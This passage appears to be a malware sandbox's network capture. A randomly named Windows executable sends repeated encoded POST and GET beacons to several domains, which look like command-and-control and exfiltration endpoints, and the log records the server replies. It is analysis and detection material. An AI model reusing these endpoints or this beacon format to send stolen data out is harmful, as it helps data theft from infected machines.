                                                                        Data Ascii: QhKxhNP=VXBo7Mv86w/xqAQoEJCWByau9b4vtgZSscyHH9wSvRSUfTQ3MYMINVImGDViDt+AMuGdmT/dwemkgHa7TpnZsdqOLzGETzvYFoDlCpy8z/PkkGq8Zu8w0FvjkrF3Vo6QJVt/0xitjSKzmskN2u43EhFOYyuulZzVmon2uIODXGS9d0QmqDykbjBXoMDdypuPro7JBOBgXxp6v+hdJph11BINnIkx
Nov 28, 2024 09:14:42.540067911 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                        Date: Thu, 28 Nov 2024 08:14:42 GMT
                                                                        Server: Apache
                                                                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                        Cache-Control: no-cache, must-revalidate, max-age=0
                                                                        Link: <https://hayaniya.org/wp-json/>; rel="https://api.w.org/"
                                                                        Upgrade: h2,h2c
                                                                        Connection: Upgrade, close
                                                                        Vary: Accept-Encoding
                                                                        Content-Encoding: gzip
                                                                        Transfer-Encoding: chunked
                                                                        Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
11 | 192.168.2.5 | 49894 | 192.185.147.100 | 80 | 2848 | C:\Program Files (x86)\hzuGXVXlIlqhzTaLrsoahghOMClgjaLtkeNhEYzbfIMXqVfl\vWFGbvOdxI.exe
Timestamp | Bytes transferred | Direction | Data
Nov 28, 2024 09:14:43.855289936 CET | 1833 | OUT | POST /yf1h/ HTTP/1.1
                                                                        Host: www.hayaniya.org
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Language: en-us
                                                                        Accept-Encoding: gzip, deflate
                                                                        Connection: close
                                                                        Content-Length: 1244
                                                                        Cache-Control: max-age=0
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Origin: http://www.hayaniya.org
                                                                        Referer: http://www.hayaniya.org/yf1h/
                                                                        User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; ZTE-Z777 Build/JLS36C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
Nov 28, 2024 09:14:45.186304092 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                        Date: Thu, 28 Nov 2024 08:14:44 GMT
                                                                        Server: Apache
                                                                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                        Cache-Control: no-cache, must-revalidate, max-age=0
                                                                        Link: <https://hayaniya.org/wp-json/>; rel="https://api.w.org/"
                                                                        Upgrade: h2,h2c
                                                                        Connection: Upgrade, close
                                                                        Vary: Accept-Encoding
                                                                        Content-Encoding: gzip
                                                                        Transfer-Encoding: chunked
                                                                        Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
12 | 192.168.2.5 | 49900 | 192.185.147.100 | 80 | 2848 | C:\Program Files (x86)\hzuGXVXlIlqhzTaLrsoahghOMClgjaLtkeNhEYzbfIMXqVfl\vWFGbvOdxI.exe
Timestamp | Bytes transferred | Direction | Data
Nov 28, 2024 09:14:46.649779081 CET | 542 | OUT | GET /yf1h/?QhKxhNP=YVpI46H16R/w/kk1bY6rBRavyZUbsgJtp9CZM+Bxvkr6dioDBNQhLHAnFkN0G7WaNsS3kDmK0ayEpl6TGabHmNyPQwWjM0ybC5bIBemWzNbXvkTcX815xQrmtulGFojAfQ==&Yby=d2ydCtHpb8 HTTP/1.1
                                                                        Host: www.hayaniya.org
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Language: en-us
                                                                        Connection: close
                                                                        User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; ZTE-Z777 Build/JLS36C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
Nov 28, 2024 09:14:47.789602995 CET | 503 | IN | HTTP/1.1 301 Moved Permanently
                                                                        Date: Thu, 28 Nov 2024 08:14:47 GMT
                                                                        Server: Apache
                                                                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                        Cache-Control: no-cache, must-revalidate, max-age=0
                                                                        X-Redirect-By: WordPress
                                                                        Upgrade: h2,h2c
                                                                        Connection: Upgrade, close
                                                                        Location: http://hayaniya.org/yf1h/?QhKxhNP=YVpI46H16R/w/kk1bY6rBRavyZUbsgJtp9CZM+Bxvkr6dioDBNQhLHAnFkN0G7WaNsS3kDmK0ayEpl6TGabHmNyPQwWjM0ybC5bIBemWzNbXvkTcX815xQrmtulGFojAfQ==&Yby=d2ydCtHpb8
                                                                        Content-Length: 0
                                                                        Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
13 | 192.168.2.5 | 49917 | 13.248.169.48 | 80 | 2848 | C:\Program Files (x86)\hzuGXVXlIlqhzTaLrsoahghOMClgjaLtkeNhEYzbfIMXqVfl\vWFGbvOdxI.exe
Timestamp | Bytes transferred | Direction | Data
Nov 28, 2024 09:14:53.351852894 CET | 790 | OUT | POST /rxts/ HTTP/1.1
                                                                        Host: www.lovel.shop
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Language: en-us
                                                                        Accept-Encoding: gzip, deflate
                                                                        Connection: close
                                                                        Content-Length: 208
                                                                        Cache-Control: max-age=0
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Origin: http://www.lovel.shop
                                                                        Referer: http://www.lovel.shop/rxts/
                                                                        User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; ZTE-Z777 Build/JLS36C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                        Data Ascii: QhKxhNP=ZOC90mTtFQvaokxMjewNkCd2Wek7u2W8b3tYCU6qQQySRuIi1olENUNt78k/70glFlrTP31CvO5JSdJxfhloMuxK5lNsqZtaTPrjTV/uAVgcduoC2TiJ1x/COAeDPPYqdmWjNeJuVfyHKwxe3P2Mu1BzhsU6/QQnDaX90F1Yk6sv4HNLMaut5btTjMH1WX+zOI9gMC4=


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        14 | 192.168.2.5 | 49924 | 13.248.169.48 | 80 | 2848 | C:\Program Files (x86)\hzuGXVXlIlqhzTaLrsoahghOMClgjaLtkeNhEYzbfIMXqVfl\vWFGbvOdxI.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Nov 28, 2024 09:14:56.013505936 CET | 810 | OUT | POST /rxts/ HTTP/1.1
                                                                        Host: www.lovel.shop
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Language: en-us
                                                                        Accept-Encoding: gzip, deflate
                                                                        Connection: close
                                                                        Content-Length: 228
                                                                        Cache-Control: max-age=0
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Origin: http://www.lovel.shop
                                                                        Referer: http://www.lovel.shop/rxts/
                                                                        User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; ZTE-Z777 Build/JLS36C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                        Data Ascii: QhKxhNP=ZOC90mTtFQva50BMi9INsCd5Z+k7hWW4b3hYCVuAQjWSSO4i0plEB0Ntzck+2UgiFkXtPyVCvPdJSY1xfQlrN+xIxFNuk5taTPrjTVrQAVYccfYC5WeGuR/FeQeDLPYudmWBNfFUVa2HKype2e2Nn1BPvMUq5D1ZMLPo/1s86ogBwR8hW4mFq7BrzfPCHnfaUrtQSVtC6yYIjl7LNlS9JELNHeyq


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        15 | 192.168.2.5 | 49930 | 13.248.169.48 | 80 | 2848 | C:\Program Files (x86)\hzuGXVXlIlqhzTaLrsoahghOMClgjaLtkeNhEYzbfIMXqVfl\vWFGbvOdxI.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Nov 28, 2024 09:14:58.689878941 CET | 1827 | OUT | POST /rxts/ HTTP/1.1
                                                                        Host: www.lovel.shop
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Language: en-us
                                                                        Accept-Encoding: gzip, deflate
                                                                        Connection: close
                                                                        Content-Length: 1244
                                                                        Cache-Control: max-age=0
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Origin: http://www.lovel.shop
                                                                        Referer: http://www.lovel.shop/rxts/
                                                                        User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; ZTE-Z777 Build/JLS36C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                        Data Ascii: QhKxhNP= [TRUNCATED]


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        16 | 192.168.2.5 | 49937 | 13.248.169.48 | 80 | 2848 | C:\Program Files (x86)\hzuGXVXlIlqhzTaLrsoahghOMClgjaLtkeNhEYzbfIMXqVfl\vWFGbvOdxI.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Nov 28, 2024 09:15:01.353698969 CET | 540 | OUT | GET /rxts/?Yby=d2ydCtHpb8&QhKxhNP=UMqd3Rr/GgjcpDtMifF0hAVXULwugGyaJHdfF0vXYxuoY8NmwcRKHFRQ3Zc522gmFWLmVhpOr5FlbfkrODlmL/pMmEFBmvtdQsTPBX/BeC8bc9YX4gHB5yTSGVyOHdtWew== HTTP/1.1
                                                                        Host: www.lovel.shop
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Language: en-us
                                                                        Connection: close
                                                                        User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; ZTE-Z777 Build/JLS36C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                        Nov 28, 2024 09:15:02.459662914 CET | 410 | IN | HTTP/1.1 200 OK
                                                                        Server: openresty
                                                                        Date: Thu, 28 Nov 2024 08:15:02 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 270
                                                                        Connection: close
                                                                        Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?Yby=d2ydCtHpb8&QhKxhNP=UMqd3Rr/GgjcpDtMifF0hAVXULwugGyaJHdfF0vXYxuoY8NmwcRKHFRQ3Zc522gmFWLmVhpOr5FlbfkrODlmL/pMmEFBmvtdQsTPBX/BeC8bc9YX4gHB5yTSGVyOHdtWew=="}</script></head></html>


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        17 | 192.168.2.5 | 49952 | 3.33.130.190 | 80 | 2848 | C:\Program Files (x86)\hzuGXVXlIlqhzTaLrsoahghOMClgjaLtkeNhEYzbfIMXqVfl\vWFGbvOdxI.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Nov 28, 2024 09:15:07.934731960 CET | 802 | OUT | POST /zs4o/ HTTP/1.1
                                                                        Host: www.duskgazes.work
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Language: en-us
                                                                        Accept-Encoding: gzip, deflate
                                                                        Connection: close
                                                                        Content-Length: 208
                                                                        Cache-Control: max-age=0
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Origin: http://www.duskgazes.work
                                                                        Referer: http://www.duskgazes.work/zs4o/
                                                                        User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; ZTE-Z777 Build/JLS36C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                        Data Ascii: QhKxhNP=12aPUta8fjPdDFEmXlrT/hQ3Cu5RIxqWJE3DJUI+Nxp0ld6MXfmQ8w8q13V9RrZJH1pv9PcKcJujpPduwc5J3TdWI8N21vnEbTqg7pUlC3hNrKXO0ZAc2olGhmnjKSextwkJQR3wSkJXep3YQq7Ujqb0pgUnrkWCBSJYEtYmSx44Ol5hs9cM3v6NJ1XCneo4K1nDK3s=


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        18 | 192.168.2.5 | 49959 | 3.33.130.190 | 80 | 2848 | C:\Program Files (x86)\hzuGXVXlIlqhzTaLrsoahghOMClgjaLtkeNhEYzbfIMXqVfl\vWFGbvOdxI.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Nov 28, 2024 09:15:10.616044044 CET | 822 | OUT | POST /zs4o/ HTTP/1.1
                                                                        Host: www.duskgazes.work
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Language: en-us
                                                                        Accept-Encoding: gzip, deflate
                                                                        Connection: close
                                                                        Content-Length: 228
                                                                        Cache-Control: max-age=0
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Origin: http://www.duskgazes.work
                                                                        Referer: http://www.duskgazes.work/zs4o/
                                                                        User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; ZTE-Z777 Build/JLS36C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                        Data Ascii: QhKxhNP=12aPUta8fjPdFUUmai/T6BQ4ce5RCRqSJErDJV95MDd0k/yMWemQ/w8q+XV8cLZCH1tJ9N4KcJ6jpOtuxvRK0jdQBcNwo/nEbTqg7pBtCxJNr6nOmtcbo4lF2Wnjcie1twkRQTDaSnxXepnYR77T2abu2wVo7XLrYANtCvRhFzs8PTIL2fUkkPW1Zmf12uJRQW3zUg5OjAA+ciic1dz9Qb5EEkfR


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        19 | 192.168.2.5 | 49965 | 3.33.130.190 | 80 | 2848 | C:\Program Files (x86)\hzuGXVXlIlqhzTaLrsoahghOMClgjaLtkeNhEYzbfIMXqVfl\vWFGbvOdxI.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Nov 28, 2024 09:15:13.284480095 CET | 1839 | OUT | POST /zs4o/ HTTP/1.1
                                                                        Host: www.duskgazes.work
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Language: en-us
                                                                        Accept-Encoding: gzip, deflate
                                                                        Connection: close
                                                                        Content-Length: 1244
                                                                        Cache-Control: max-age=0
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Origin: http://www.duskgazes.work
                                                                        Referer: http://www.duskgazes.work/zs4o/
                                                                        User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; ZTE-Z777 Build/JLS36C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                        Data Ascii: QhKxhNP= [TRUNCATED]


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        20 | 192.168.2.5 | 49973 | 3.33.130.190 | 80 | 2848 | C:\Program Files (x86)\hzuGXVXlIlqhzTaLrsoahghOMClgjaLtkeNhEYzbfIMXqVfl\vWFGbvOdxI.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Nov 28, 2024 09:15:15.980632067 CET | 544 | OUT | GET /zs4o/?QhKxhNP=40yvXZqQXwyOFTl0d1fxwhQGTsZjKCC3JWjHJEZ8IBZutO+YSqvvwioh1RBVRKlMIRVxucUqEMWgr+FAgfZYoR4vWuFQr4uBZgu5x5JrNmZwlLDog/JQkd5M42bUbwrevw==&Yby=d2ydCtHpb8 HTTP/1.1
                                                                        Host: www.duskgazes.work
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Language: en-us
                                                                        Connection: close
                                                                        User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; ZTE-Z777 Build/JLS36C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                        Nov 28, 2024 09:15:17.045238018 CET | 410 | IN | HTTP/1.1 200 OK
                                                                        Server: openresty
                                                                        Date: Thu, 28 Nov 2024 08:15:16 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 270
                                                                        Connection: close
                                                                        Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?QhKxhNP=40yvXZqQXwyOFTl0d1fxwhQGTsZjKCC3JWjHJEZ8IBZutO+YSqvvwioh1RBVRKlMIRVxucUqEMWgr+FAgfZYoR4vWuFQr4uBZgu5x5JrNmZwlLDog/JQkd5M42bUbwrevw==&Yby=d2ydCtHpb8"}</script></head></html>


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        21 | 192.168.2.5 | 49984 | 172.67.222.69 | 80 | 2848 | C:\Program Files (x86)\hzuGXVXlIlqhzTaLrsoahghOMClgjaLtkeNhEYzbfIMXqVfl\vWFGbvOdxI.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Nov 28, 2024 09:15:22.555114031 CET | 823 | OUT | POST /xyvr/ HTTP/1.1
                                                                        Host: www.zrinorem-srumimit.sbs
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Language: en-us
                                                                        Accept-Encoding: gzip, deflate
                                                                        Connection: close
                                                                        Content-Length: 208
                                                                        Cache-Control: max-age=0
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Origin: http://www.zrinorem-srumimit.sbs
                                                                        Referer: http://www.zrinorem-srumimit.sbs/xyvr/
                                                                        User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; ZTE-Z777 Build/JLS36C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                        Data Ascii: QhKxhNP=OmXQT89rv7odv2YI1g8eWVCw8CmH05wIsUgNBvVZmZ7ip2K/UvhQ90Tb+h1hp042xLpZ0uCLMwfuyD9+9tjPkS3r4pZYiYUrjSNnDmoo0wmke+GbbYVa0aEuEtpJSP3DsQRdyDDkAZpyMtUfccVDI67WgAE/e4qrQttQFTUnob6vzEksJym8NNe/Jhf+KjlpH9Zy6V4=
                                                                        Nov 28, 2024 09:15:23.873202085 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                        Date: Thu, 28 Nov 2024 08:15:23 GMT
                                                                        Content-Type: text/html
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        Vary: Accept-Encoding
                                                                        Last-Modified: Sat, 14 Sep 2024 06:51:15 GMT
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aiTvGJUOdRFKR9plj95L8vps6suq%2Fp71DOmgp%2FA0eaTabHxfo7A5e24OCP2PEuyhmzBa6qq3ir0jS9XCixpPdQTJDDNFlY2wfVrDXC4yvRrXjKtKF%2BEHreozL2%2B5HoTnthZw5a5I0%2BNGCRIk"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8e98e8ebefebc439-EWR
                                                                        Content-Encoding: gzip
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1456&min_rtt=1456&rtt_var=728&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=823&delivery_rate=0&cwnd=205&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Nov 28, 2024 09:15:23.873219967 CET | 381 | IN


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        22 | 192.168.2.5 | 49991 | 172.67.222.69 | 80 | 2848 | C:\Program Files (x86)\hzuGXVXlIlqhzTaLrsoahghOMClgjaLtkeNhEYzbfIMXqVfl\vWFGbvOdxI.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Nov 28, 2024 09:15:25.222577095 CET | 843 | OUT | POST /xyvr/ HTTP/1.1
                                                                        Host: www.zrinorem-srumimit.sbs
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Language: en-us
                                                                        Accept-Encoding: gzip, deflate
                                                                        Connection: close
                                                                        Content-Length: 228
                                                                        Cache-Control: max-age=0
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Origin: http://www.zrinorem-srumimit.sbs
                                                                        Referer: http://www.zrinorem-srumimit.sbs/xyvr/
                                                                        User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; ZTE-Z777 Build/JLS36C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                        Data Ascii: QhKxhNP=OmXQT89rv7oduWIIzHoeQ1CxgymHtpwUsUsNBqkEmvTipX6/XuhQzUTbxB1kt056xLtv0v+LMwLuyDN++aPMlC3pwJZa9IUrjSNnDlVD00KkfO2bB69Z3aEpSdpJBf3PsQRvyGjOAflyMskffNVAdq7YtgFONpTSZd5QFCp2/4mAyyVGTQuUetyHZyXJbTEAdeJCkCuxN+YDdxZAHV4MEwWCepv5
                                                                        Nov 28, 2024 09:15:26.487931013 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                        Date: Thu, 28 Nov 2024 08:15:26 GMT
                                                                        Content-Type: text/html
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        Vary: Accept-Encoding
                                                                        Last-Modified: Sat, 14 Sep 2024 06:51:15 GMT
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=59BQ5sQlMG%2F1MryFme4dyRB%2BCa6iuggC5IZ32I0NCZ3WUdQmqT9AWANf6fRMOLB%2FajHO7OddhU%2FXNEAmmj%2FzjQYHfTNdbqP5e6zIVLqhhidAyllh57%2BaqtwI3yDjHpEgGZehV18TeL1Wh%2BXJ"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8e98e8fc5ba95e7c-EWR
                                                                        Content-Encoding: gzip
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1574&min_rtt=1574&rtt_var=787&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=843&delivery_rate=0&cwnd=181&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Nov 28, 2024 09:15:26.488049984 CET | 390 | IN


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        23 | 192.168.2.5 | 49999 | 172.67.222.69 | 80 | 2848 | C:\Program Files (x86)\hzuGXVXlIlqhzTaLrsoahghOMClgjaLtkeNhEYzbfIMXqVfl\vWFGbvOdxI.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Nov 28, 2024 09:15:27.887921095 CET | 1860 | OUT | POST /xyvr/ HTTP/1.1
                                                                        Host: www.zrinorem-srumimit.sbs
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Language: en-us
                                                                        Accept-Encoding: gzip, deflate
                                                                        Connection: close
                                                                        Content-Length: 1244
                                                                        Cache-Control: max-age=0
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Origin: http://www.zrinorem-srumimit.sbs
                                                                        Referer: http://www.zrinorem-srumimit.sbs/xyvr/
                                                                        User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; ZTE-Z777 Build/JLS36C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                        Nov 28, 2024 09:15:29.245755911 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                        Date: Thu, 28 Nov 2024 08:15:29 GMT
                                                                        Content-Type: text/html
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        Vary: Accept-Encoding
                                                                        Last-Modified: Sat, 14 Sep 2024 06:51:15 GMT
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QVMafmkQv6i9ejtgc1j4zSvMTgutuCa4M%2BNvQb%2BkeHq5LyGcJplKH8NFYGVrzM7Qk7qHnwC7kR43lGr1N%2BXwnA2aUQrIWO7Jx7mm%2FF8zi%2FBNvJ73UCmCKAfnpMnf8MXLT3FtLSGcNw%2BTDtRV"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8e98e90d8a35180d-EWR
                                                                        Content-Encoding: gzip
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1463&min_rtt=1463&rtt_var=731&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1860&delivery_rate=0&cwnd=199&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Nov 28, 2024 09:15:29.245919943 CET | 384 | IN


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        24 | 192.168.2.5 | 50006 | 172.67.222.69 | 80 | 2848 | C:\Program Files (x86)\hzuGXVXlIlqhzTaLrsoahghOMClgjaLtkeNhEYzbfIMXqVfl\vWFGbvOdxI.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Nov 28, 2024 09:15:30.552664042 CET | 551 | OUT | GET /xyvr/?Yby=d2ydCtHpb8&QhKxhNP=Dk/wQKBXq4hP/zVb9ApyZmDkyzbQqrM0hWgYI5VbiKGV4GeQY6os12Lf5EdpuHYA6f15h+K7XFjq1wIjorrCnH6ZrrhC9s12l00lNHx4+XmTSfuGU54Az/E2dcdiA+66+g== HTTP/1.1
                                                                        Host: www.zrinorem-srumimit.sbs
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Language: en-us
                                                                        Connection: close
                                                                        User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; ZTE-Z777 Build/JLS36C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                        Nov 28, 2024 09:15:31.883143902 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                        Date: Thu, 28 Nov 2024 08:15:31 GMT
                                                                        Content-Type: text/html
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        Vary: Accept-Encoding
                                                                        Last-Modified: Sat, 14 Sep 2024 06:51:15 GMT
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uyxmWUU%2FHsSeGJc9Fk%2BD3Zqywqi1dEgTh0aOr1NA3vyoGXX03ccCMKODSNEnw6NwrqmwV5V%2BxleLJMCIMMMDhdFxXKEkQYDtoKZbh3ZgbB6jbUIFSHy4VH39Zovu51GMyT9SPIKjq7ctnEFk"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8e98e91df89e1a24-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1993&min_rtt=1993&rtt_var=996&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=551&delivery_rate=0&cwnd=212&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Data Ascii: 59e<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head> <title>404 &mdash; Not Found</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/> <meta name="description" content="Sorry, page not found"/> <style type="text/c
                                                                        Nov 28, 2024 09:15:31.883244991 CET | 1061 | IN
                                                                        Data Ascii: ss"> body {font-size:14px; color:#777777; font-family:arial; text-align:center;} h1 {font-size:180px; color:#99A7AF; margin: 70px 0 0 0;} h2 {color: #DE6C5D; font-family: arial; font-size: 20px; font-weight: bold; lette


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        25 | 192.168.2.5 | 50007 | 103.249.106.91 | 80 | 2848 | C:\Program Files (x86)\hzuGXVXlIlqhzTaLrsoahghOMClgjaLtkeNhEYzbfIMXqVfl\vWFGbvOdxI.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Nov 28, 2024 09:15:37.988668919 CET | 793 | OUT | POST /dnjw/ HTTP/1.1
